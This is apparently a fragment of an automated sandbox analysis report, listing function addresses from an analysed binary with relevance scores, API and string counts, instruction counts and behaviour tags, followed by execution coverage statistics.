0040611A | 5.3 | 2 | 1 | 44 | registry, COMMON |
00405831 | 5.3 | 2 | 1 | 24 | process, COMMON |
00406D8B | 5.2 | 4 | - | 236 | COMMON |
00406F8C | 5.2 | 4 | - | 208 | COMMON |
00406CA2 | 5.2 | 4 | - | 205 | COMMON |
004067A7 | 5.2 | 4 | - | 198 | COMMON |
00406BF5 | 5.2 | 4 | - | 180 | COMMON |
00406D13 | 5.2 | 4 | - | 170 | COMMON |
00406C5F | 5.2 | 4 | - | 168 | COMMON |
0040202C | 4.6 | 3 | - | 73 | library, COMMON |
00405912 | 4.5 | 3 | - | 28 | file, COMMON |
00401389 | 3.0 | 2 | - | 43 | window, COMMON |
00405383 | 3.0 | 2 | - | 32 | com, COMMON |
00401E43 | 3.0 | 2 | - | 25 | COMMON |
00401573 | 3.0 | 2 | - | 23 | COMMON |
00405D3E | 3.0 | 2 | - | 16 | file, COMMON |
00405D19 | 3.0 | 2 | - | 13 | COMMON |
004057FC | 3.0 | 2 | - | 9 | COMMON |
0040167B | 1.5 | 1 | - | 38 | file, COMMON |
00402306 | 1.5 | 1 | - | 25 | COMMON |
00401735 | 1.5 | 1 | - | 24 | COMMON |
00405DC1 | 1.5 | 1 | - | 22 | file, COMMON |
00405DF0 | 1.5 | 1 | - | 22 | file, COMMON |
00402348 | 1.5 | 1 | - | 20 | COMMON |
004015A3 | 1.5 | 1 | - | 18 | COMMON |
0040422D | 1.5 | 1 | - | 9 | window, COMMON |
00404216 | 1.5 | 1 | - | 6 | window, COMMON |
004032F5 | 1.5 | 1 | - | 6 | COMMON |
00404203 | 1.5 | 1 | - | 4 | COMMON |
00401F00 | 1.3 | 1 | - | 37 | COMMON |
00404C2C | 63.5 | 33 | 3 | 481 | window, memory, COMMON |
004046B0 | 26.5 | 10 | 5 | 275 | string, COMMON |
00402862 | 1.5 | 1 | - | 30 | file, COMMON |
0040437E | 38.7 | 19 | 3 | 204 | window, string, COMMON |
00405E98 | 21.1 | 10 | 2 | 130 | memory, string, COMMON |
00404248 | 12.1 | 8 | - | 61 | COMMON |
00402644 | 10.7 | 5 | 1 | 153 | file, COMMON |
00404B7A | 10.5 | 5 | 1 | 48 | window, COMMON |
00402DD7 | 10.5 | 5 | 1 | 40 | time, COMMON |
00404A6C | 8.8 | 3 | 2 | 84 | string, COMMON |
00402592 | 8.8 | 3 | 2 | 69 | string, COMMON |
00401D57 | 7.5 | 5 | - | 39 | window, COMMON |
00401C19 | 7.1 | 3 | 1 | 84 | window, time, COMMON |
00405B1D | 7.0 | 3 | 1 | 16 | string, COMMON |
00402E5D | 6.0 | 4 | - | 33 | COMMON |
00405224 | 5.3 | 2 | 1 | 46 | window, COMMON |
00405B69 | 5.3 | 2 | 1 | 16 | string, COMMON |
00405CA3 | 5.0 | 4 | - | 37 | string, COMMON |
Execution Graph
Execution Coverage: | 11.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 8.8% |
Total number of Nodes: | 34 |
Total number of Limit Nodes: | 5 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
003370A0 | 1.6 | 1 | - | 65 | COMMON |
0033F0F8 | 1.6 | 1 | - | 129 | COMMON |
0033709A | 1.6 | 1 | - | 68 | COMMON |
0033F1C8 | 1.6 | 1 | - | 54 | COMMON |
0030D030 | 0.1 | - | - | 72 | COMMON |
0030D02B | 0.1 | - | - | 53 | COMMON |
0033FB24 | 0.0 | - | - | 4 | COMMON |